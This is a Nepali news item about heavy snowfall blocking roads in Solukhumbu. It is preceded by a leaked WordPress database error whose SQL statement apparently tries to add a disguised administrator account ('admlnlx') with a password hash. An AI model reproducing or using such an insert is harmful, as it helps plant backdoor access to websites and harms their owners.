WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE.YgaN4pICaI2WWPfKoK8jfIHQjeZ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:01:18', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुको सदरमुकाम सल्लेरी सहित हिमाली क्षेत्रमा भारी हिमपात भैरहेको छ ।
गएरातिबाट हिउँ पर्न थालेपछि सडकमा बाक्लो हिउँ जमेका कारण सवारी साधन चल्न सकेका छैन भने जिल्लाबाट दैनिक रुपमा राजधानी काठमाडौ लगायत अन्य स्थानहरुमा जाने सवारी साधनहरु छुट्न्र नसकेको यातायात ब्यवसायि गनेश राईले बताए ।
सडक मार्गबाट जिल्ला भित्रने एक मात्र नाका पत्ताले क्षेत्रको सडकमा २ फिट भन्दा बाढि हिउँ जमेकाले तत्काल यातायातका साधन चल्ने सम्भावना कम रहेको राईले बताए ।
जिल्लाको खुम्बु क्षेत्रमा करिब ११/१२ दिन यता दैनिक जसो नै हिमपात भैरहेको छ भने गएराति देखि सुरु भएको भारी हिमपातले जनजीवन प्रभावित बनेको छ ।


